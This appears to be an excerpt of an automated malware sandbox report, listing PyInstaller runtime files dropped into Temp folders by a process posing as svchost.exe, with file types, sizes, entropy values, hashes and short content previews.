                          SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-runtime-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22840
                          Entropy (8bit):6.942029615075195
                          Encrypted:false
                          SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                          MD5:41A348F9BEDC8681FB30FA78E45EDB24
                          SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                          SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                          SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-stdio-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24368
                          Entropy (8bit):6.873960147000383
                          Encrypted:false
                          SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                          MD5:FEFB98394CB9EF4368DA798DEAB00E21
                          SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                          SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                          SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-string-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):23488
                          Entropy (8bit):6.840671293766487
                          Encrypted:false
                          SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                          MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                          SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                          SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                          SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-time-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.018061005886957
                          Encrypted:false
                          SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                          MD5:849F2C3EBF1FCBA33D16153692D5810F
                          SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                          SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                          SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-utility-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.127951145819804
                          Encrypted:false
                          SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                          MD5:B52A0CA52C9C207874639B62B6082242
                          SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                          SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                          SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:Zip archive data, at least v2.0 to extract
                          Category:dropped
                          Size (bytes):788326
                          Entropy (8bit):5.450096772437984
                          Encrypted:false
                          SSDEEP:12288:hE7Qf7ul3vNuOn9/eV8h9+fsEaD1VykmrMbbcor:i7Qf7AvT/eV8h9+fsEaxdbbdr
                          MD5:8EB57166E2699F02C4BC8BE1383F283D
                          SHA1:1B89862749423F4A683B4DA2ADE4610CCD715E92
                          SHA-256:9F7818513C4A3D482539D83B0F5669D1C92D0E4DE707F028152EF2DC1F071F0E
                          SHA-512:259E001ED7417CFCAC6F8428422048CEB13ED2F814C27345EC55BF619E11F02D6464EFE30445AA6D3FD827582E8E1932DF4F59C9AAC6B0C6E77CB6102CC39607
                          Malicious:false
                          Reputation:unknown
                          Preview: PK..........!...^D............_bootlocale.pycU............e.....................@...sz...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.).z.A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C...s....t.j.j.r.d.S.t.....d...S.).N..UTF-8.....)...sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r.....Lc:\users\ieuser\appdata\local\programs\python\python38-32\lib\_bootlocale.py..getpreferredencoding....s..........r......getandroidapilevelc....................C...s....d.S.).Nr....r....r....r....r....r....r........s......c....................C...s....t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r....).r....r....r......localer....).r....r....r....r....r....r........s............c....................C...s6...|.r.t...t.j.j
                          C:\Users\user\AppData\Local\Temp\_MEI61562\file.exe.manifest
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1490
                          Entropy (8bit):5.276963138578381
                          Encrypted:false
                          SSDEEP:24:2dt4+iNKg9mMPgi0iiNK+bkgxIme7cb3jgMkb4+GE:cSFKgYSEK+bkgxImeMcn3GE
                          MD5:0AA1B4EF7F524C59405E0F7B3F004920
                          SHA1:24B2A847CC79132566696803636E53CC9D87D79D
                          SHA-256:6F78C922ADC11D653C278685025181E37EE7976C5A57DF34EC297166A82F016D
                          SHA-512:26924E70A196FA455C68BE1DCFEEEC1F507A04BE79DE57A55523939C49F106A46194A379109B9348FF009CF5BBB7B676206FB14BBDFC82DFFD67EC2E77309214
                          Malicious:false
                          Reputation:unknown
                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity type="win32" name="file" processorArchitecture="x86" version="1.0.0.0"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false"/>.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" language="*" processorArchitecture="*" version="6.0.0.0" publicKeyToken="6595b64144ccf1df"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"/>.. </dependentAssembly>.. </dependency>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440
                          C:\Users\user\AppData\Local\Temp\_MEI61562\libcrypto-1_1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):2234560
                          Entropy (8bit):6.107082014192982
                          Encrypted:false
                          SSDEEP:49152:mIvPtO+ejtvRMO8xxZv1CPwDv3uFfJhFcl:xvPtwjnMO8HZv1CPwDv3uFfJh6
                          MD5:76DA35FDE4E3E110331612AB351A811C
                          SHA1:1836517441C70848DB3F5D4EF4EA0CB2E330732A
                          SHA-256:ECABC901FA89CD771405C004849384A5148644C273A88048AE16C86BD14EF4DD
                          SHA-512:A43DAE59C7D71E38F6365413946EE740C643299403DFE531D0CDBD561623807784830124B786422799AE45852F5AA541B5A94FA8E0947850547E2446BA99BC30
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\libffi-7.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):29208
                          Entropy (8bit):6.643623418348
                          Encrypted:false
                          SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                          MD5:BC20614744EBF4C2B8ACD28D1FE54174
                          SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                          SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                          SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\libssl-1_1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):538304
                          Entropy (8bit):5.760022892820208
                          Encrypted:false
                          SSDEEP:12288:AqejFQiEYXBYYu3yzOBC4ISRpQuU2lvz/c:xaFJ5zF41TQuU2lvz/c
                          MD5:0E15ACB04CFABDE2A6493FAA49E74280
                          SHA1:E8EAC74A6DA0F1E78C66F84C14CF92DF18CC7E8A
                          SHA-256:A59EC84F8AE6F0174D5C1CE3ABC22B0FDCED6B50F7C8B689367AC859AC9E08E7
                          SHA-512:12D24D5FD42829FD0F89A1E42F46CD498D71E441EC803161319E721A3280406589B540EC949BBB6C0AF661CE806BA50A1097B7793C9A1CCC83061DEC4FC753AD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\pyexpat.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):168624
                          Entropy (8bit):6.629244601257658
                          Encrypted:false
                          SSDEEP:3072:ZhgFHiME7l8Z5bYwLoE8KZKGjUdGjN81IuBhh7Eu0:QFHc7l8ZORKZKGjtjN8E
                          MD5:6E2329BA53FF8B6E2E4069A859EE3FCE
                          SHA1:1C067F16A3069A44EDF7A073FA35B70B86F99405
                          SHA-256:27363A2DCDD990DEF43307B1644DC03304F9478830C8989C49F9DA2491889E6E
                          SHA-512:C0FCC4F0AE5C019ADAE3593F81BA26CA8C5CF6A7C15B78FD42B052DBDA6CBDEFDC6F8FA52C3FD614F1B17F48725D58CA23972C8B7C183EAFC0D542251A9EF23D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\python38.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):4052656
                          Entropy (8bit):6.720992659261596
                          Encrypted:false
                          SSDEEP:49152:NgQmEhbJSgm06kaUr9Alta2tPfx1CI8jXHB7MZnCPYJAT37PtLKK4WoooOA:iEWg5uta2/8LHxMZBJ4lKKoooOA
                          MD5:7B97AB4F12ED448B26669B83F9061BEF
                          SHA1:0E2516F3DC50EFB7FAA0B276830B4F95D8084772
                          SHA-256:E7312737C82CC967FB669AE4C2736CB005F4192E1654C717DBDC5986E562957B
                          SHA-512:4F123981982EA4AFFE230CBDCDBEC9DE419D4F3D92C026B2DF3DA7D2BE9BEFAAB707167265CFC97FF183F13A60BE6C53FB541E00F518BEACE819B8B9B4927D8A
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\pywintypes38.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):115712
                          Entropy (8bit):6.533866514211769
                          Encrypted:false
                          SSDEEP:3072:QCf+6EE1b22/q4+ldC56PsZyLY7b00nPO4KMGSncyl8ZpFI:h+xE1iz4+ldC5msYLY7b00PO4KMGScyW
                          MD5:3206CF4CD05B9E993A822C0DAC05B1D0
                          SHA1:F49E809FB19BC1E24F1A7904663375554BD4D5CD
                          SHA-256:9A3B70353BB9346BF1ECD2784164FEAF6DBC9CB969298091F549EF8269AEF930
                          SHA-512:A6A4AA66E264E2438DF573D31DA0827650F48F4877ECABF391D284C99019E041F3333A708E2657FFC565B0CB9933D9C7A77B3726B8F4EC0DDA5DA3C5E8AB68C0
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\select.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24752
                          Entropy (8bit):6.44568082211825
                          Encrypted:false
                          SSDEEP:384:Tg7oA2vjUzNJmTgj0nq1RiPFdd+k1IumGEKDG4y8cLrhX:ccnvjANJiXnqSdWk1IumGEKDG4yLrhX
                          MD5:404C4F2FF59DA1993518D39754376606
                          SHA1:560A0F8A301EF5FEF541C6CE64975E3AA1AD1460
                          SHA-256:BB4FE62B14AD6FC559A1D88339D0F302450DAFEC09CF6027069F66B6D5BEF1AB
                          SHA-512:585ECF2B3DA37F1144191A70CA7C29151DE3C6BC1943719318BC291B29A08BB7E4A8C6200F8C743DF8BD32225221CADEB8306450B7E491B9B16AA94587711169
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\ucrtbase.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1142072
                          Entropy (8bit):6.809041027525523
                          Encrypted:false
                          SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                          MD5:D6326267AE77655F312D2287903DB4D3
                          SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                          SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                          SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\unicodedata.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1091248
                          Entropy (8bit):5.360848319038452
                          Encrypted:false
                          SSDEEP:12288:gJz3Q191SnFRHotduNpqQOZ6gBjCmN/X4GyCAx9++bBlhJk93cgewrxEekMGv:gJ3KSogG7hCc/4D9nbDhG2wr0MGv
                          MD5:5FB1A0234305D5B69DB79B4F7F89EBCA
                          SHA1:9A6EF3DD3A024B433566AC20146344A1F0631F9B
                          SHA-256:D9AF40281331CF55E21E20A57342FE86C6C729906D6A3AF3F3F3AD00F2284ABE
                          SHA-512:FE52C0AE494459B8D015E2E28AF92BDCF6A491DC424D803B3E87E21612C4654136335E5399F5CA0FEF4717EECE75D53AC11050623E109E4F7ED59392D74A9085
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\win32api.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):104960
                          Entropy (8bit):6.460606710335285
                          Encrypted:false
                          SSDEEP:3072:KloBRQj7JH+VldRcmShLAG9wRcM7RSuQrbCQGt5Ne/eo:KloBa4ncmhWKUu/7t5Nen
                          MD5:2866BF1A085564A0F63B76173943BA64
                          SHA1:CAF810657651B1EC3F667A671E8F9307EEEA98B7
                          SHA-256:3021294B610E01ABD37289DDBE2BF0507E7DE3FCB678E07525EC4E0892747955
                          SHA-512:D1090831BA6D06C09F1DFE2790B435020854E328F9826937244C13CDDB1080CAB35F3679AB34EB44D88F9BECF4CCF933CD2EBE1B5CC853758BFA9BC04B002068
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\win32event.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22016
                          Entropy (8bit):5.972372003642818
                          Encrypted:false
                          SSDEEP:384:AkUKkjmkLfkoke6am07BxEjr6p+zDLIkOn/T7AdlF7EpmkteAi5tjVUjaPGaCG:A3KwmwfzkAHUr6uQkG/T7AdlF7Epmktl
                          MD5:29EC0D47B88A465F69B5E18A3D35E1D0
                          SHA1:91739F4227A6DFA4F1F107DD19D01B9E2C90C177
                          SHA-256:9BA207206559F40D534100DF3C847E2A67D8008A8EE98E991D5CD6B0813B8624
                          SHA-512:552F4C4892C453B64CE84D8DBEB9B15E3506A0666867AF5CFB28C6B167E2C81F8EED0A8598DEEBB38C90D0B2CCBEC69223C2D487256541D041D85B2F0FDC871D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI61562\win32gui.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):176128
                          Entropy (8bit):6.424412252153223
                          Encrypted:false
                          SSDEEP:3072:uVvRKIA/oqLcDwPY5Fej7oLyqx9NkdMiCawrLwCNzR0jzlZ+6KLDtW8d7U:6RNA/oqLcDwPY5FeCNkdMiCasvRIK6KE
                          MD5:844D345409407D3C470219342EFBD80C
                          SHA1:70612D8676009CC780ABE61583996473F027334A
                          SHA-256:42898717D0D574B6C4BEAD3C07A67368FCBFC49F498997A3A08E24612F4EF365
                          SHA-512:8A54414DA2D72331441AE5F47690F91C676ED6CD2B96B57AAE783774E5A1FE03F225DDD1DFDAE77E93897E3AE3DA7609A99448184C6BB1D92D3D600BAD17D7A4
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\Include\pyconfig.h
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:C source, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):21096
                          Entropy (8bit):5.30196060437062
                          Encrypted:false
                          SSDEEP:384:rG3tApdkHRMYURIn1/8BsRV4ig8as8Ji2MgsdgTaXgDV:rG3tApWySE+aPfZXvV
                          MD5:31FEF4BD7506D25D27BF596F949A2066
                          SHA1:41F1D3A07B331220DAEA0B106D29D2A2DB74B45E
                          SHA-256:12347EF4F8CA786D33CAC569DDF61ACBDC506F986D1AA34F3BAAD8C062543DD3
                          SHA-512:062A1EF84DB04D91810CF81604A23E5226326E0BAD0B66077A22D05AC3EF6A06B36EFEBC0552FE2C0FAA17221275E95E77D11B952A29B6D3C3DB144622336B77
                          Malicious:false
                          Reputation:unknown
                          Preview: #ifndef Py_CONFIG_H..#define Py_CONFIG_H..../* pyconfig.h. NOT Generated automatically by configure.....This is a manually maintained version used for the Watcom,..Borland and Microsoft Visual C++ compilers. It is a..standard part of the Python distribution.....WINDOWS DEFINES:..The code specific to Windows should be wrapped around one of..the following #defines....MS_WIN64 - Code specific to the MS Win64 API..MS_WIN32 - Code specific to the MS Win32 (and Win64) API (obsolete, this covers all supported APIs)..MS_WINDOWS - Code specific to Windows, but all versions...Py_ENABLE_SHARED - Code if the Python core is built as a DLL.....Also note that neither "_M_IX86" or "_MSC_VER" should be used for..any purpose other than "Windows Intel x86 specific" and "Microsoft..compiler specific". Therefore, these should be very rare.......NOTE: The following symbols are deprecated:..NT, USE_DL_EXPORT, USE_DL_IMPORT, DL_EXPORT, DL_IMPORT..MS_CORE_DLL.....WIN32 is still required for the locale modul
                          C:\Users\user\AppData\Local\Temp\_MEI63082\VCRUNTIME140.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):76168
                          Entropy (8bit):6.781149490150774
                          Encrypted:false
                          SSDEEP:1536:zgTqURG2vo0RwvI7sjBH+cOKXc36r23oEecbi0mju:zdURhvZ6vIQVrPypecbi0m
                          MD5:87DD91C56BE82866BF96EF1666F30A99
                          SHA1:3B78CB150110166DED8EA51FBDE8EA506F72AEAF
                          SHA-256:49B0FD1751342C253CAC588DDA82EC08E4EF43CEBC5A9D80DEB7928109B90C4F
                          SHA-512:58C3EC6761624D14C7C897D8D0842DBEAB200D445B4339905DAC8A3635D174CDFB7B237D338D2829BC6C602C47503120AF5BE0C7DE6ABF2E71C81726285E44D6
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_asyncio.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):57520
                          Entropy (8bit):6.4179566473980465
                          Encrypted:false
                          SSDEEP:1536:0iULU9Lbx5udbmDoOTXPnbhyBDmuo2iwBIuYncjNayr:0i4MLLbhamuo2iwBIuYncj3
                          MD5:54414D216C4DEA54799DC0F5CE657FBE
                          SHA1:0043CFCAE73985C7739ABDF6DBB0E4291EFDB5D2
                          SHA-256:CEF9A3D83E7CC45D99D666A6F8E7E58CC68ACB14E8858FE5BC6ED54A0F7C3898
                          SHA-512:F3CB7C8D38E59EB8F9A1CF693AD032FD560B4CCCB604B11C1BAE837FE045591C969A7E1EDF35F1BA9546EEF0E3C5D0D70188393B3C656B91ED95736AFC8A5358
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_bz2.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):79536
                          Entropy (8bit):6.643809455301382
                          Encrypted:false
                          SSDEEP:1536:02MfT59id2pNXdCQXa64t3oS8bOWUwXpIuMVwqJyb:0T/5pNXdFa6llbOWUwXpIuMVwq0
                          MD5:445CE6BCEFB6EDDF0D953DBA17E0B320
                          SHA1:3D5FB5EEC6ECA27D37CAAE31F173DFD53909C74C
                          SHA-256:CF721704D96F071DE10A1E174A07BB1211864EA588CE1C4D6023F11701AAAB13
                          SHA-512:31B2247CB06C1905AE6857CC6FC23A9FC5E1C4FB7E76229D7444B417353A3EC76412DE73FF08750C09F5D1AD8644B8C07D79B3820E594AFE997DC733F610AA41
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_ctypes.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):117424
                          Entropy (8bit):6.568932798472365
                          Encrypted:false
                          SSDEEP:1536:UhnXb10JQfHRFDrz2EH7EHURqBcNVValsffwv3TuLlbuRB/FfZWxOSQKkx1IuBPO:UhnLAI5xVVals3Py/FZWobKU1IuBPxEP
                          MD5:286CE553108A74197DF006D71D31918F
                          SHA1:01A9FDE2833F2FC684A442169480ECFC8F1559D0
                          SHA-256:13A45B718DF8CB4C0218F720C396973F8A501678C6CB6EF9380730C97553EE8C
                          SHA-512:3CA8AB25B4B069C702E02226623C0CEA55CDB7EC3FEEA50C81A0A2350BDCB9B5BB2C2D7768C810743024EA99568F20DF51ACC4AF28DAACDE0AF18F0F5D6B7A1F
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_decimal.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):228528
                          Entropy (8bit):6.825703510403188
                          Encrypted:false
                          SSDEEP:6144:vISxoQN8s3Hs6B+ruCQxuqaxV3XMW5gVrserORH0i:vISxoS8s3HSruCQ6userOhv
                          MD5:DD8724365CDF7372892B0220BC8007C0
                          SHA1:0C43CFABCD2FD710432C7E76CF58CFEDE05F9069
                          SHA-256:FF753B671FE3A1D09B4676A0E08F85A4B19D0F5DD06B50DCA31339911730F343
                          SHA-512:42AF80495E1FA96A438ECE00D896D02BF3249BC4832CB182511384DB438A41F07A54A6F3F03FD992F32901A4D684E66EF337BA379CB0C9245A621CD04DB26B0D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_hashlib.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):39088
                          Entropy (8bit):6.576705962671287
                          Encrypted:false
                          SSDEEP:768:cAtCkdtp99Be3oOQi2ApPXl/mr/2IBIuYIBpLDG4y2jha:cAckdtp9/2oOQi3pfVm/2IBIuYIZyt
                          MD5:76A7E9C182FB34121881B868829786E5
                          SHA1:40392A3BAD97AA8C7C7C7ADD34A59F170E917747
                          SHA-256:D6F37E0BC993D76BFD3D8F28963E0936D893C3EA1B6A4B2ABCB06A053FF0BB94
                          SHA-512:4CE0AD1149F6A2619DFA17DDFC46AE3ECBE18A2A111A3457DF99B84B6F8768FCDB6470C3B0F93C08D43B06218C56EC19C7D21A6D4AEEB86F98A51DBCBCBBEC7D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_lzma.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):159408
                          Entropy (8bit):6.960223316470766
                          Encrypted:false
                          SSDEEP:3072:wV3Rr96Jf12nMU7gc22JNO2cUDQoxXChHALHuki4zHfBg9mNoaCmERoTpIuD1qyO:+hkFPMrxyhHALHEOpgYObdRoT0R
                          MD5:45D91843D03A51354A43D8DCECDF22E1
                          SHA1:C982DCDCEE7B2D64AEAA478D8FFE0087B64E391D
                          SHA-256:DB9ABC004E8DA4511025E47A255727CB45111195C6AEB6D50B61A037D7408D0A
                          SHA-512:34A13E0445499F7B655C40D9431710FDCCF1BFDA1C7477F23481E7C42526284736714ED38949F91098131F80B635631E3A0BA73DD3734D4E0759EE7F32968364
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_multiprocessing.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26800
                          Entropy (8bit):6.4189500308991985
                          Encrypted:false
                          SSDEEP:384:p6hMLUifrlrCojAelk6WPw6DsuOZRIuABLipJXj0DG4y8V5OB8hU:7lr9WY298RIuAtin0DG4ymFhU
                          MD5:DBEC7953A3000BB513B26A26F6C1128D
                          SHA1:B4CBF27FAB8DF534BE31D021E4C49C42161D4CBF
                          SHA-256:307046C4F970F910968EDDC6CB9B65767FA3A70C05AA966DD6434021FEEEBDDC
                          SHA-512:2C4D84F5D27E2EB84C1867223C147AB7B5F3C0B72671A5FBCC5936B3449D683AEBD7D3D2F07B4F4203E5D6523F0BD3F8314773567D5FB6FD7262A3CEBC84D20F
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_overlapped.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):40112
                          Entropy (8bit):6.515613246434881
                          Encrypted:false
                          SSDEEP:768:iW1TpulXdyBdthIw5o8IYkITWb7PkNIuttgHDG4y5Eh8i:EXdyBdRTTWb7PkNIuttghydi
                          MD5:4E5C64134B6C40E187B7F8627A6D8A2D
                          SHA1:F5C6AFFAB5A1D14D8B586A1893E136D87DDAAD75
                          SHA-256:5EEF3EB8F87D332128569E4810F9283FF57417F1BB67D59D1AB2F471505DC1B1
